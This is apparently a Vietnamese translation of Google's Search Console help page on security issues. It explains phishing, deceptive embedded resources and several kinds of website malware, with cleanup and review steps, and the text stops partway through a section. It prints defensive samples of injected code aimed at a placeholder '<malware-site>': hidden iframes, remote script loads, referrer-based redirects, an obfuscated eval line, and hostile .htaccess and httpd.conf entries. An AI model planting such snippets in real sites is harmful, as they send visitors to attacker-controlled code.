Báo cáo về các vấn đề bảo mật

Nếu kết quả đánh giá của Google cho thấy trang web của bạn đã bị tấn công hoặc có hành vi có thể gây hại cho khách truy cập hoặc máy tính của họ, thì bảng báo cáo về các vấn đề bảo mật sẽ trình bày các kết quả này. Các ví dụ về hành vi có hại bao gồm tấn công lừa đảo hoặc cài đặt phần mềm có hại hoặc phần mềm không mong muốn vào máy tính của người dùng.

Những trang chịu ảnh hưởng của một vấn đề bảo mật  có thể xuất hiện kèm theo một nhãn cảnh báo trong kết quả tìm kiếm hoặc trình duyệt có thể hiển thị một trang cảnh báo trung gian khi người dùng cố gắng truy cập những trang này.

Mở bảng báo cáo về các vấn đề bảo mật

 

Vấn đề bảo mật là gì?

Vấn đề bảo mật thuộc các loại sau:

  • Nội dung bị tấn công: Đây là bất kỳ nội dung nào được đặt lên trang web mà không có sự cho phép của bạn do các lỗ hổng bảo mật trên trang web. Để bảo vệ người dùng của chúng tôi, Google cố gắng hết sức để xóa nội dung bị tấn công khỏi kết quả tìm kiếm của chúng tôi. Tìm hiểu thêm.
  • Phần mềm có hại và phần mềm không mong muốn: Đây là phần mềm được thiết kế để gây hại cho thiết bị hoặc người dùng thiết bị, tham gia vào các hành vi lừa đảo hoặc không mong muốn, hoặc ảnh hưởng tiêu cực đến người dùng. Tìm hiểu thêm.
  • Tấn công phi kỹ thuật: Đây là nội dung lừa người dùng thực hiện một hành động gì đó nguy hiểm, chẳng hạn như cung cấp thông tin mật hoặc tải phần mềm xuống. Tìm hiểu thêm.

Có vấn đề bảo mật nào trên trang web của tôi không?

Nếu có vấn đề bảo mật trên trang web của bạn, bạn sẽ thấy tổng số vấn đề bảo mật trên trang web ở đầu bảng báo cáo.

Nếu trang web của bạn không có vấn đề bảo mật, bạn sẽ thấy dấu kiểm màu xanh lá cây và thông báo tương ứng.

Nhưng tôi vừa mới mua trang web này mà!

Nếu gần đây bạn đã mua một trang web mà đã có vấn đề bảo mật từ trước khi mua, hãy khắc phục các vấn đề trong bảng báo cáo về các vấn đề bảo mật và gửi yêu cầu xem xét lại để cho chúng tôi biết rằng bạn chỉ mới mua trang web gần đây và hiện trang web đã tuân thủ Nguyên tắc quản trị trang web của Google.

Những trang nào bị ảnh hưởng?

Hãy mở rộng phần mô tả vấn đề để xem danh sách mẫu về các URL bị ảnh hưởng. Danh sách này có thể không đầy đủ mà chỉ bao gồm các trang mẫu trên trang web chịu ảnh hưởng của vấn đề bạn chọn. Đôi khi, bạn có thể gặp một vấn đề bảo mật nhưng không có URL ví dụ trong báo cáo; điều này không có nghĩa là không có trang nào bị ảnh hưởng mà là vì chúng tôi không thể tạo mẫu do một số lý do.

Thông tin chi tiết của vấn đề cho thấy ngày đầu tiên chúng tôi phát hiện thấy vấn đề này trên trang web của bạn, cũng như nội dung mô tả ngắn gọn và đường liên kết để tìm hiểu thêm về vấn đề.

Khắc phục vấn đề

Để khắc phục vấn đề bảo mật trên trang web của bạn, hãy thực hiện theo các bước sau:

  1. Mở rộng phần mô tả vấn đề trên bảng báo cáo về các vấn đề bảo mật.
  2. Đọc nội dung mô tả về vấn đề và truy cập đường liên kết "Tìm hiểu thêm" để xem thông tin chi tiết và các bước khắc phục vấn đề đó. (Đường liên kết tìm hiểu thêm chỉ đến các phần mô tả bên dưới trên trang này.)
  3. Hãy dùng các ví dụ mẫu về các trang bị ảnh hưởng được cung cấp trong phần chi tiết để khắc phục vấn đề của bạn. Danh sách này có thể không đầy đủ mà chỉ bao gồm các trang mẫu trên trang web chịu ảnh hưởng của vấn đề này. Bạn có thể gặp một vấn đề bảo mật nhưng không có URL ví dụ trong báo cáo; điều này không có nghĩa là không có trang nào bị ảnh hưởng mà là vì chúng tôi không thể tạo mẫu vì một số lý do.
  4. Khắc phục vấn đề trong toàn bộ trang web của bạn. Việc khắc phục vấn đề trên một số trang sẽ không giúp các trang này xuất hiện lại trong kết quả tìm kiếm.
  5. Nếu báo cáo liệt kê nhiều vấn đề bảo mật ảnh hưởng đến trang web của bạn, hãy khắc phục tất cả các vấn đề đó.
  6. Kiểm tra kết quả khắc phục của bạn.
  7. Khi bạn đã khắc phục tất cả các vấn đề trong báo cáo trên tất cả các trang, hãy chọn Yêu cầu xem xét lại trong bảng báo cáo về các vấn đề bảo mật. Mô tả cách khắc phục của bạn trong yêu cầu xem xét lại. Một yêu cầu xem xét lại thích hợp bao gồm ba nội dung:
    • Giải thích chính xác vấn đề chất lượng trên trang web của bạn.
    • Mô tả các bước bạn đã thực hiện để khắc phục vấn đề.
    • Ghi lại kết quả của các nỗ lực của bạn.
  8. Quy trình xem xét lại có thể mất vài tuần. Chúng tôi sẽ gửi thông báo về tiến độ cho bạn qua email. Sau khi gửi yêu cầu, bạn sẽ nhận được thông báo xác nhận việc xem xét lại để bạn biết rằng chúng tôi đang tiến hành xem xét. Đừng gửi lại yêu cầu trước khi bạn nhận được quyết định cuối cùng về yêu cầu đang chờ xử lý của mình.

Quy trình xem xét lại sẽ mất bao lâu?

Có thể đến vài tuần. Chúng tôi sẽ thông báo cho bạn qua email khi đã nhận được yêu cầu của bạn để bạn biết rằng chúng tôi đang xử lý yêu cầu. Bạn cũng sẽ nhận được email khi quá trình xem xét lại hoàn tất.

Vui lòng không gửi lại yêu cầu trước khi bạn nhận được quyết định về bất kỳ yêu cầu đang xử lý nào. Nếu bạn gửi yêu cầu xem xét lại khi chưa khắc phục vấn đề, thì thời gian xử lý yêu cầu tiếp theo của bạn có thể lâu hơn hoặc thậm chí bạn có thể bị đánh dấu là người vi phạm nhiều lần.

Danh sách các vấn đề bảo mật

Dưới đây là danh sách các vấn đề bảo mật có thể xảy ra và thông tin về cách khắc phục từng vấn đề. Các vấn đề được phân loại là lỗi  hoặc cảnh báo .

Các trang lừa đảo

Trang web của bạn có nội dung lừa người dùng thực hiện một hành động gì đó nguy hiểm, chẳng hạn như cung cấp thông tin mật hoặc tải phần mềm xuống. Công cụ Duyệt web An toàn của Google bảo vệ người dùng web bằng cách cảnh báo cho người dùng trước khi họ truy cập các trang thường xuyên hiển thị nội dung lừa đảo.

Các trang web bị coi là lừa đảo khi chúng:

  • Giả vờ hành động hoặc trông có vẻ như một thực thể đáng tin cậy, như thiết bị hay trình duyệt của riêng bạn hoặc bản thân trang web hoặc
  • Cố lừa bạn thực hiện hành động gì đó mà bạn chỉ làm cho một bên đáng tin cậy, như chia sẻ mật khẩu, gọi bộ phận hỗ trợ kỹ thuật hay tải phần mềm xuống.

Loại nội dung lừa đảo này được gọi là tấn công phi kỹ thuậtTìm hiểu thêm về hành vi tấn công phi kỹ thuật hoặc xem các ví dụ về các trang lừa đảo.

Khắc phục vấn đề

1. Xác nhận vấn đề

Truy cập các trang ví dụ để tìm nội dung lừa đảo. Bạn có thể sử dụng công cụ Kiểm tra URL để xem trang web của mình ở cả chế độ xem cho thiết bị di động và máy tính để bàn.

2. Khắc phục vấn đề trên các trang của bạn

Khắc phục vấn đề trên bất kỳ trang nào có hành vi tấn công phi kỹ thuật. Nếu bạn tin rằng công cụ Duyệt web an toàn đã phân loại nhầm một trang, vui lòng báo cáo tại đây.

3. Yêu cầu xem xét lại

Khi bạn xác nhận rằng vấn đề đã được khắc phục trên trang web của mình, hãy yêu cầu xem xét lại tính bảo mật trong bảng báo cáo về các vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.

Tài nguyên nhúng có tính chất lừa đảo

Trang web của bạn có quảng cáo hoặc tài nguyên nhúng mang tính chất lừa đảo để lừa khách truy cập thực hiện một hành động gì đó nguy hiểm, chẳng hạn như cung cấp thông tin mật hoặc tải phần mềm không mong muốn xuống. Nội dung lừa đảo có thể được đưa vào thông qua tài nguyên nhúng trên trang, chẳng hạn như hình ảnh, các thành phần bên thứ ba khác hoặc quảng cáo. Công cụ Duyệt web An toàn của Google bảo vệ người dùng web bằng cách cảnh báo cho người dùng trước khi họ truy cập các trang thường xuyên hiển thị nội dung lừa đảo.

Đôi khi nội dung này hiển thị cho người dùng trên trang web lưu trữ. Trong các trường hợp khác, trang web lưu trữ không hiển thị bất kỳ quảng cáo nào, nhưng dẫn người dùng đến các trang lừa đảo thông qua cửa sổ bật mở, cửa sổ ẩn hay các loại chuyển hướng khác. Trong mọi trường hợp, loại nội dung nhúng này đều sẽ dẫn đến lỗi vi phạm chính sách trên trang lưu trữ.

Loại nội dung lừa đảo này được gọi là tấn công phi kỹ thuậtTìm hiểu thêm về hành vi tấn công phi kỹ thuật hoặc xem các ví dụ về tài nguyên nhúng mang tính chất lừa đảo.

Khắc phục vấn đề

1. Xác nhận vấn đề

Truy cập các trang ví dụ để tìm nội dung lừa đảo. Xác minh rằng mọi quảng cáo, hình ảnh hay tài nguyên bên thứ ba được nhúng trên các trang thuộc trang web của bạn đều không phải là nội dung lừa đảo. Xin lưu ý rằng mạng quảng cáo có thể xoay vòng các quảng cáo hiển thị trên các trang thuộc trang web của bạn. Vì thế bạn có thể cần phải làm mới trang vài lần trước khi có thể thấy bất kỳ quảng cáo kỹ nghệ xã hội nào hiển thị. Một số quảng cáo có thể hiển thị theo cách khác nhau trên thiết bị di động và máy tính để bàn. Bạn có thể sử dụng công cụ Kiểm tra URL để xem trang web của mình ở cả chế độ xem cho thiết bị di động và máy tính.

2. Xóa các quảng cáo hoặc tài nguyên lừa đảo

Kiểm tra tài nguyên bên thứ ba có trong trang web của bạn. Đảm bảo rằng mọi quảng cáo, hình ảnh hay tài nguyên bên thứ ba được nhúng trên các trang thuộc trang web của bạn đều không phải là nội dung lừa đảo. Khắc phục vấn đề trên bất kỳ trang nào có hành vi tấn công phi kỹ thuật.

3. Yêu cầu xem xét lại

Khi bạn xác nhận rằng vấn đề đã được khắc phục trên trang web của mình, hãy yêu cầu xem xét lại tính bảo mật trong bảng báo cáo về các vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.

Phần mềm độc hại
Trang web của bạn đã bị nhiễm hoặc đang lưu trữ phần mềm độc hại từ tin tặc. Phần mềm độc hại là bất kỳ phần mềm hay ứng dụng dành cho thiết bị di động nào được thiết kế với chủ đích gây hại cho máy tính, thiết bị di động, phần mềm mà máy tính hay thiết bị đang chạy hoặc người dùng.

1. Xác định xem bạn có thể tự mình khắc phục vấn đề không

Để khắc phục vấn đề về phần mềm độc hại trên trang web của mình, bạn phải có thể đọc và hiểu mã, và có thể là cả cấu hình máy chủ web cho trang. Nếu bạn nghĩ rằng điều này nằm ngoài khả năng của mình, hãy đọc phần Xây dựng nhóm hỗ trợ để tìm hiểu về việc tìm kiếm sự trợ giúp.

2. Chẩn đoán và khắc phục vấn đề về phần mềm có hại

Có nhiều loại phần mềm có hại. Hãy đọc các phần sau để cố gắng chẩn đoán và khắc phục loại phần mềm có hại cụ thể trên trang web của bạn. Xin lưu ý rằng trang web của bạn có thể bị nhiễm nhiều hơn một loại phần mềm độc hại, vì thế, hãy chẩn đoán và dọn dẹp kỹ trên trang web của bạn.

Loại phần mềm độc hại: Cấu hình máy chủ

Mô tả

Một tin tặc đã xâm hại trang web của bạn và đang chuyển hướng khách truy cập từ trang web của bạn đến trang web tấn công phần mềm có hại của họ, có thể bằng cách thay đổi (các) tệp cấu hình trong máy chủ của bạn. Tệp cấu hình máy chủ thường cho phép quản trị viên trang web xác định hành vi chuyển hướng URL cho các trang hoặc thư mục cụ thể trên một trang web. Ví dụ: trên máy chủ Apache, đây là tệp .htaccess và httpd.conf.

Khắc phục vấn đề

1. Xác nhận vấn đề

Truy cập một số URL mẫu có trong bảng báo cáo về các vấn đề bảo mật.

Tránh sử dụng trình duyệt để xem các trang bị nhiễm phần mềm độc hại trên trang web của bạn.

Bởi vì phần mềm độc hại thường lây lan bằng cách khai thác lỗ hổng trình duyệt, việc mở một trang bị nhiễm phần mềm độc hại trong một trình duyệt có thể làm hỏng máy tính của bạn. Ngoài ra, tin tặc có thể ẩn nội dung spam bằng kỹ thuật che giấu để tránh bị chủ sở hữu trang web phát hiện.

Dưới đây là hai phương pháp thay thế để xem nội dung theo cách an toàn hơn trên máy tính của bạn:

  • Sử dụng công cụ Kiểm tra URL để xem trang của bạn trong giao diện hiển thị với Google. Điều này rất hữu ích vì nhiều tin tặc thực hiện các sự thay đổi chỉ hiển thị với máy của Google. Ví dụ: họ có thể thêm liên kết từ trang web của bạn vào trang web của họ mà các liên kết này chỉ hiển thị khi liên kết giới thiệu là Google.
  • Sử dụng cURL hoặc Wget để thực hiện các yêu cầu HTTP (chẳng hạn như tìm nạp một trang) từ dòng lệnh. Các công cụ miễn phí này rất hữu ích trong việc chẩn đoán chuyển hướng và có thể xác định liên kết giới thiệu hoặc thông tin tác nhân người dùng. Tin tặc thường chỉ tấn công các tác nhân người dùng hoặc liên kết giới thiệu cụ thể để tránh bị phát hiện và chọn các mục tiêu tốt hơn. Việc sử dụng các công cụ này cho phép bạn bắt chước một mục tiêu. Hãy thử sử dụng các địa chỉ liên kết giới thiệu khác nhau (chẳng hạn như liên kết từ các trang web lớn hoặc các công cụ tìm kiếm khác nhau) nếu yêu cầu của bạn không dẫn đến hành vi gửi nội dung spam. Ví dụ: để bắt chước một người dùng truy cập liên kết từ kết quả Google Tìm kiếm đến www.example.com/page.html trên máy Windows, bạn sẽ sử dụng cURL như sau:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Phản hồi từ một trang bị nhiễm "cấu hình máy chủ" có thể bao gồm các tiêu đề sau:

...
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 24 Feb 2013 21:06:45 GMT
< Server: Apache
< Location: http://<malware-attack-site>/index.html
< Content-Length: 253
...

2. Xóa loại phần mềm có hại "cấu hình máy chủ" khỏi trang web

Đăng nhập vào máy chủ của bạn thông qua phương thức truy cập shell/đầu cuối (bạn có thể ngắt kết nối mạng cho trang web nếu muốn) và xem lại các tệp cấu hình máy chủ liên quan. Có thể có nhiều hơn một tệp cấu hình máy chủ bị xâm nhập trên trang web của bạn. Hãy kiểm tra tệp để tìm lệnh không mong muốn, chẳng hạn như chuyển hướng, mà qua đó tin tặc có thể định cấu hình trang web của bạn để chuyển hướng đến các trang web tấn công phần mềm có hại chưa xác định. Ví dụ: trong tệp .htaccess, bạn có thể thấy một lệnh chuyển hướng như sau:

RewriteEngine On 
RewriteCond %{HTTP_REFERER} .*google.* 
RewriteRule ^third-page.html($|/) http://<malware-site>/index.html [R=301]

 

Ngoài ra:

  • Hãy đảm bảo kiểm tra toàn bộ tệp trong trường hợp tin tặc thêm mã của họ vào cuối tệp, nơi mà nó có thể dễ dàng bị bỏ qua.
  • Điều tra các cron job có khả năng do tin tặc tạo ra để cập nhật liên tục tệp .htaccess. Cron job có thể được liệt kê trong một số địa điểm bao gồm /etc/crontab (cả nhiều thư mục /etc/cron* khác) và /var/spool/cron.
  • Đọc hướng dẫn về Trường hợp bị tấn công để biết quy trình khắc phục hoàn chỉnh cho trang web của bạn, bao gồm các bước dọn dẹp và mẹo để ngăn trang web của bạn không bị tấn công lần nữa.
Loại phần mềm có hại: Chèn SQL

Mô tả

Một tin tặc có thể đã xâm nhập cơ sở dữ liệu trang web của bạn. Ví dụ: tin tặc có thể đã chèn mã có hại bằng cách lập trình vào mọi bản ghi của bảng cơ sở dữ liệu, để khi máy chủ tải một trang yêu cầu thông tin từ cơ sở dữ liệu, thì mã có hại sẽ được nhúng vào nội dung của trang và có khả năng gây hại cho khách truy cập trang.

Khắc phục vấn đề

1. Xác nhận vấn đề

Chạy một số truy vấn về các URL bị ảnh hưởng trong dòng lệnh và kiểm tra phản hồi xem có các từ thuộc hành vi tấn công SQL như "iframe" hoặc "eval" không.

Tránh sử dụng trình duyệt để xem các trang bị nhiễm phần mềm độc hại trên trang web của bạn.

Bởi vì phần mềm độc hại thường lây lan bằng cách khai thác lỗ hổng trình duyệt, việc mở một trang bị nhiễm phần mềm độc hại trong một trình duyệt có thể làm hỏng máy tính của bạn. Ngoài ra, tin tặc có thể ẩn nội dung spam bằng kỹ thuật che giấu để tránh bị chủ sở hữu trang web phát hiện.

Dưới đây là hai phương pháp thay thế để xem nội dung theo cách an toàn hơn trên máy tính của bạn:

  • Sử dụng công cụ Kiểm tra URL để xem trang của bạn trong giao diện hiển thị với Google. Điều này rất hữu ích vì nhiều tin tặc thực hiện các sự thay đổi chỉ hiển thị với máy của Google. Ví dụ: họ có thể thêm liên kết từ trang web của bạn vào trang web của họ mà các liên kết này chỉ hiển thị khi liên kết giới thiệu là Google.
  • Sử dụng cURL hoặc Wget để thực hiện các yêu cầu HTTP (chẳng hạn như tìm nạp một trang) từ dòng lệnh. Các công cụ miễn phí này rất hữu ích trong việc chẩn đoán chuyển hướng và có thể xác định liên kết giới thiệu hoặc thông tin tác nhân người dùng. Tin tặc thường chỉ tấn công các tác nhân người dùng hoặc liên kết giới thiệu cụ thể để tránh bị phát hiện và chọn các mục tiêu tốt hơn. Việc sử dụng các công cụ này cho phép bạn bắt chước một mục tiêu. Hãy thử sử dụng các địa chỉ liên kết giới thiệu khác nhau (chẳng hạn như liên kết từ các trang web lớn hoặc các công cụ tìm kiếm khác nhau) nếu yêu cầu của bạn không dẫn đến hành vi gửi nội dung spam. Ví dụ: để bắt chước một người dùng truy cập liên kết từ kết quả Google Tìm kiếm đến www.example.com/page.html trên máy Windows, bạn sẽ sử dụng cURL như sau:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Tiếp theo, hãy đăng nhập vào máy chủ cơ sở dữ liệu hoặc xem cơ sở dữ liệu của bạn thông qua một công cụ như phpMyAdmin. Nếu bạn sử dụng wget hoặc cURL, hãy cố đối chiếu thiệt hại phát hiện thấy trong mã nguồn của trang thông qua wget hoặc cURL với các mục cơ sở dữ liệu thực tế. Ví dụ: nếu bạn nhận thấy trang của mình có iframe nguy hiểm, bạn có thể thực hiện truy vấn SQL tìm kiếm mã iframe. Ví dụ:

SELECT * FROM blog_posts WHERE post_text LIKE '%>iframe%';

Bạn cũng có thể muốn kiểm tra nhật ký cơ sở dữ liệu và các tệp lỗi trên máy chủ để xem có hoạt động bất thường hay không, chẳng hạn như các lệnh SQL không mong muốn có vẻ bất thường đối với người dùng thường xuyên hoặc lỗi.

2. Dọn dẹp trang web của bạn

Khi đã sẵn sàng dọn dẹp trang web, bạn có thể cập nhật mỗi bản ghi cơ sở dữ liệu bị nhiễm hoặc khôi phục lại bản sao lưu cơ sở dữ liệu gần nhất mà bạn biết.

Ngoài ra:

Loại phần mềm có hại: Chèn mã

Mô tả

Các trang trên trang web của bạn đã bị sửa đổi để bao gồm mã có hại, chẳng hạn như iframe đến một trang web tấn công phần mềm có hại.

Khắc phục vấn đề

1. Xác nhận vấn đề

Truy cập các URL được liệt kê là bị nhiễm trong báo cáo Vấn đề Bảo mật. Kiểm tra HTML của các phản hồi để tìm mã có hại.

Tránh sử dụng trình duyệt để xem các trang bị nhiễm phần mềm độc hại trên trang web của bạn.

Bởi vì phần mềm độc hại thường lây lan bằng cách khai thác lỗ hổng trình duyệt, việc mở một trang bị nhiễm phần mềm độc hại trong một trình duyệt có thể làm hỏng máy tính của bạn. Ngoài ra, tin tặc có thể ẩn nội dung spam bằng kỹ thuật che giấu để tránh bị chủ sở hữu trang web phát hiện.

Dưới đây là hai phương pháp thay thế để xem nội dung theo cách an toàn hơn trên máy tính của bạn:

  • Sử dụng công cụ Kiểm tra URL để xem trang của bạn trong giao diện hiển thị với Google. Điều này rất hữu ích vì nhiều tin tặc thực hiện các sự thay đổi chỉ hiển thị với máy của Google. Ví dụ: họ có thể thêm liên kết từ trang web của bạn vào trang web của họ mà các liên kết này chỉ hiển thị khi liên kết giới thiệu là Google.
  • Sử dụng cURL hoặc Wget để thực hiện các yêu cầu HTTP (chẳng hạn như tìm nạp một trang) từ dòng lệnh. Các công cụ miễn phí này rất hữu ích trong việc chẩn đoán chuyển hướng và có thể xác định liên kết giới thiệu hoặc thông tin tác nhân người dùng. Tin tặc thường chỉ tấn công các tác nhân người dùng hoặc liên kết giới thiệu cụ thể để tránh bị phát hiện và chọn các mục tiêu tốt hơn. Việc sử dụng các công cụ này cho phép bạn bắt chước một mục tiêu. Hãy thử sử dụng các địa chỉ liên kết giới thiệu khác nhau (chẳng hạn như liên kết từ các trang web lớn hoặc các công cụ tìm kiếm khác nhau) nếu yêu cầu của bạn không dẫn đến hành vi gửi nội dung spam. Ví dụ: để bắt chước một người dùng truy cập liên kết từ kết quả Google Tìm kiếm đến www.example.com/page.html trên máy Windows, bạn sẽ sử dụng cURL như sau:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Dưới đây là một số ví dụ về mã có hại:

  • iframe tải một trang web có hại:
    <iframe frameborder="0" height="0" src="http://<malware-site>/path/file" 
      style="display:none" width="0"></iframe>
  • JavaScript hoặc một ngôn ngữ kịch bản gọi và chạy các tập lệnh từ một trang web tấn công:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • Tập lệnh chuyển hướng trình duyệt đến một trang web tấn công:
    <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://<malware-site>/");
      }
    </script>
  • Mã có hại bị xáo trộn để tránh phát hiện:
    eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • Các tệp đối tượng được chia sẻ được thiết kế để ghi ngẫu nhiên mã có hại vào các tập lệnh vô hại:
    #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

Hãy kiểm tra tất cả các mã có hại có thể có trên trang web. Có thể sẽ hữu ích nếu bạn tìm kiếm các từ như "iframe" để tìm mã iframe. Các từ khóa hữu ích khác là "script", "eval" và "unescape". Ví dụ: để tìm kiếm "iframe" trong tất cả các tệp trên các hệ thống dựa trên Unix, hãy thực hiện lệnh sau:

$grep -irn "iframe" ./ | less

2. Dọn dẹp trang web của bạn

Khi đã sẵn sàng dọn dẹp trang web của bạn, bạn có thể thay thế các tệp bị ảnh hưởng bằng bản sao lưu hợp lệ gần nhất hoặc xóa mã bị chèn khỏi mọi trang và tất cả các chức năng hoặc tệp lệnh liên quan. Nếu đã sửa đổi các tệp cấu hình máy chủ, bạn có thể cần phải khởi động lại máy chủ web của mình để các sự thay đổi này có hiệu lực.

Ngoài ra:

Loại phần mềm có hại: mẫu lỗi

Mô tả

Mẫu được sử dụng cho các thông báo lỗi, chẳng hạn như 404 File not Found, được định cấu hình để phát tán phần mềm có hại. Bằng cách này, kẻ tấn công có thể xâm nhập các URL thậm chí không tồn tại trên trang web của bạn.

Khắc phục vấn đề

1. Xác nhận vấn đề

Yêu cầu một trang không tồn tại trên trang web của bạn hoặc một trang có loại lỗi khác và kiểm tra phản hồi để xem liệu trang có đến từ một trang web khác hoặc có chứa phần mềm độc hại hay không.

Tránh sử dụng trình duyệt để xem các trang bị nhiễm phần mềm độc hại trên trang web của bạn.

Bởi vì phần mềm độc hại thường lây lan bằng cách khai thác lỗ hổng trình duyệt, việc mở một trang bị nhiễm phần mềm độc hại trong một trình duyệt có thể làm hỏng máy tính của bạn. Ngoài ra, tin tặc có thể ẩn nội dung spam bằng kỹ thuật che giấu để tránh bị chủ sở hữu trang web phát hiện.

Dưới đây là hai phương pháp thay thế để xem nội dung theo cách an toàn hơn trên máy tính của bạn:

  • Sử dụng công cụ Kiểm tra URL để xem trang của bạn trong giao diện hiển thị với Google. Điều này rất hữu ích vì nhiều tin tặc thực hiện các sự thay đổi chỉ hiển thị với máy của Google. Ví dụ: họ có thể thêm liên kết từ trang web của bạn vào trang web của họ mà các liên kết này chỉ hiển thị khi liên kết giới thiệu là Google.
  • Sử dụng cURL hoặc Wget để thực hiện các yêu cầu HTTP (chẳng hạn như tìm nạp một trang) từ dòng lệnh. Các công cụ miễn phí này rất hữu ích trong việc chẩn đoán chuyển hướng và có thể xác định liên kết giới thiệu hoặc thông tin tác nhân người dùng. Tin tặc thường chỉ tấn công các tác nhân người dùng hoặc liên kết giới thiệu cụ thể để tránh bị phát hiện và chọn các mục tiêu tốt hơn. Việc sử dụng các công cụ này cho phép bạn bắt chước một mục tiêu. Hãy thử sử dụng các địa chỉ liên kết giới thiệu khác nhau (chẳng hạn như liên kết từ các trang web lớn hoặc các công cụ tìm kiếm khác nhau) nếu yêu cầu của bạn không dẫn đến hành vi gửi nội dung spam. Ví dụ: để bắt chước một người dùng truy cập liên kết từ kết quả Google Tìm kiếm đến www.example.com/page.html trên máy Windows, bạn sẽ sử dụng cURL như sau:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

2. Dọn dẹp trang web của bạn

Đăng nhập vào máy chủ web của bạn và tìm kiếm các tệp cấu hình máy chủ để tìm lệnh về trang lỗi. Ví dụ, mẫu lỗi cho máy chủ web Apache có thể được khai báo trong tệp .htaccess. Dưới đây là ví dụ về một mục trong tệp .htaccess có chức năng truy xuất các trang lỗi 404 từ một trang web có hại:

ErrorDocument 404 http://<malware-site>/index.html 

Khi đã sẵn sàng dọn dẹp trang web của bạn, bạn có thể thay thế (các) tệp .htaccess bằng một bản sao lưu hợp lệ đã biết hoặc xóa các lệnh ErrorDocument không mong muốn trên (các) tệp .htaccess hiện có. Hãy nhớ xóa các tệp lỗi thực tế nếu chúng tồn tại trên trang web của bạn. Cuối cùng, khởi động lại máy chủ web để đảm bảo tất cả các sự thay đổi có hiệu lực.

Ngoài ra:

Loại phần mềm độc hại: Phần mềm độc hại trên nhiều trang web

Mô tả

Trang web đang tải nội dung từ một trang web được biết là có chứa nội dung có hại. Trong Chrome, điều này được biểu hiện bằng quảng cáo xen kẽ trên trình duyệt với hình ảnh sau đây:

cross-site malware warning

Khắc phục vấn đề

  1. Xác nhận vấn đề bằng cách duyệt đến một vài URL mẫu được liệt kê trong bảng báo cáo về các vấn đề bảo mật. Bạn sẽ thấy hình ảnh ở trên nếu đây là vấn đề phần mềm có hại trên nhiều trang web.
  2. Cảnh báo trong trình duyệt sẽ cho bạn biết miền chứa nội dung có vấn đề. Hãy xóa tất cả các mục tham chiếu đến trang web bị gắn cờ trong cảnh báo của trình duyệt.
  3. Nếu bạn phát hiện ra rằng một trang trên trang web của bạn vẫn lấy nội dung từ một trang bị gắn cờ mà bạn không hề hay biết, thì vấn đề sẽ nghiêm trọng hơn và trang web của bạn rất có thể đã bị xâm phạm. Trong cả hai trường hợp, Google khuyên bạn sử dụng giao thức khôi phục trong Trợ giúp cho trang web bị tấn công để cách ly trang web của bạn, đánh giá tổn hại và dọn dẹp trang web.
  4. Sau khi bạn xóa tất cả nội dung tấn công phi kỹ thuật khỏi trang web của mình, hãy yêu cầu xem xét lại tính bảo mật trong bảng báo cáo về các vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.
  5. Nếu bạn cố tình chèn nội dung từ một trang từng tuân thủ trước đây nhưng sau đó bị gắn cờ và bạn muốn chèn lại nội dung sau khi trang bị gắn cờ đã được dọn dẹp, thì bạn có thể theo dõi trạng thái của trang bị gắn cờ trên trang chẩn đoán của Duyệt web An toàn của Google về trang đó (http://www.google.com/safebrowsing/diagnellect?site=www.example.com). Chủ sở hữu của các trang web hợp lệ thường sẽ nhanh chóng dọn dẹp trang của họ.
Các loại phần mềm độc hại khác

Có nhiều loại phần mềm độc hại khác có thể ảnh hưởng đến trang web của bạn. Hãy xem trang Kiến thức cơ bản về web để biết thêm mẹo về cách chẩn đoán và khắc phục các kiểu tấn công khác. Sau khi khắc phục trang web của bạn, hãy yêu cầu xem xét lại.

3. Yêu cầu xem xét lại

Khi bạn xác nhận rằng vấn đề đã được khắc phục trên trang web của mình, hãy yêu cầu xem xét lại tính bảo mật trong bảng báo cáo về các vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.

Kiểu tấn công: Chèn mã

Một tin tặc đã xâm nhập trang web của bạn và đang chèn mã độc vào các trang của bạn. Ví dụ: chuyển hướng đến một trang web có hại hoặc chạy phần mềm khai thác tiền điện tử trên trình duyệt của bạn trong khi trang đang mở.

1. Xác định xem bạn có thể tự mình khắc phục vấn đề không

Xem phần Xây dựng nhóm hỗ trợ để biết bạn cần những gì để tự khắc phục vấn đề này, hoặc cách tìm kiếm sự trợ giúp nếu bạn nghĩ rằng điều này nằm ngoài khả năng của bạn.

2. Xác nhận vấn đề

Tránh sử dụng trình duyệt để xem các trang bị nhiễm phần mềm độc hại trên trang web của bạn.

Bởi vì phần mềm độc hại thường lây lan bằng cách khai thác lỗ hổng trình duyệt, việc mở một trang bị nhiễm phần mềm độc hại trong một trình duyệt có thể làm hỏng máy tính của bạn. Ngoài ra, tin tặc có thể ẩn nội dung spam bằng kỹ thuật che giấu để tránh bị chủ sở hữu trang web phát hiện.

Dưới đây là hai phương pháp thay thế để xem nội dung theo cách an toàn hơn trên máy tính của bạn:

  • Sử dụng công cụ Kiểm tra URL để xem trang của bạn trong giao diện hiển thị với Google. Điều này rất hữu ích vì nhiều tin tặc thực hiện các sự thay đổi chỉ hiển thị với máy của Google. Ví dụ: họ có thể thêm liên kết từ trang web của bạn vào trang web của họ mà các liên kết này chỉ hiển thị khi liên kết giới thiệu là Google.
